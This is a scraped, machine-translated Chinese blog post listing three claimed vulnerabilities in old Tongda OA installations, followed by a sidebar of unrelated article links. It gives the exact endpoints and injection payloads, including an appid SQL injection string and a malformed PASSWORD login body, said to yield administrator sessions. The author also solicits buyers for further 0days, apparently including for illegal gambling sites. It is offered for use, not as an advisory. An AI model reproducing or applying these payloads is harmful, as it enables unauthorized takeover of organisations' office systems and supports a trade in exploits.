当前位置:网站首页>Tongda injection 0day
Tongda injection 0day
2022-07-07 07:35:00 【Immortal fish】
Catalog
The old version of Tongda Application :
Loophole 1:
The vulnerability lies in :
/ispirit/login_code_check.php?codeuid=An attacker can get the administrator session
python Script :
no
Loophole principle : The main reason is that the old version has unauthorized access .
Loophole 2:
Leak location :
pda/appcenter/submenu.php?appid=11+and+pow(999,1)The loophole is appid There is an injection , You can get the administrator sessions
Loophole 3:
Leak location :
logincheck.php
UNAME=admin&PASSWORD='&encode_type=1The loophole is password There is an injection , You can get the administrator sessions
more 0day Please subscribe to me ~ In addition, our px send bc Of 0day, You can contact me
边栏推荐
- English translation is too difficult? I wrote two translation scripts with crawler in a rage
- Why is the row of SQL_ The ranking returned by number is 1
- 电商常规问题part1
- Causes and solutions of oom (memory overflow)
- 弹性布局(一)
- Docker compose start redis cluster
- Hidden Markov model (HMM) learning notes
- 4、 High performance go language release optimization and landing practice youth training camp notes
- 按键精灵脚本学习-关于天猫抢红包
- Le Service MySQL manque dans le service informatique
猜你喜欢
Convolutional neural network -- understanding of pooling
Detailed explanation of neo4j installation process
Leetcode-226. Invert Binary Tree
三、高质量编程与性能调优实战 青训营笔记
【Liunx】进程控制和父子进程
Robot technology innovation and practice old version outline
抽絲剝繭C語言(高階)數據的儲存+練習
我理想的软件测试人员发展状态
2022-07-06:以下go语言代码是否会panic?A:会;B:不会。 package main import “C“ func main() { var ch chan struct
1089: highest order of factorial
随机推荐
[2022 CISCN]初赛 web题目复现
Redis data migration
Calculus key and difficult points record part integral + trigonometric function integral
外包干了四年,废了...
Chinese and English instructions prosci LAG-3 recombinant protein
PostgreSQL source code (59) analysis of transaction ID allocation and overflow judgment methods
Pass parent component to child component: props
抽丝剥茧C语言(高阶)数据的储存+练习
1140_ SiCp learning notes_ Use Newton's method to solve the square root
Fullgc problem analysis and solution summary
Blue Bridge Cup Birthday candles (violence)
English translation is too difficult? I wrote two translation scripts with crawler in a rage
About binary cannot express decimals accurately
IO流 file
Kuboard can't send email and nail alarm problem is solved
Stockage et pratique des données en langage C (haut niveau)
Le Service MySQL manque dans le service informatique
L'externalisation a duré trois ans.
Communication between non parent and child components
The metauniverse of the platofarm farm continues to expand, with Dao governance as the core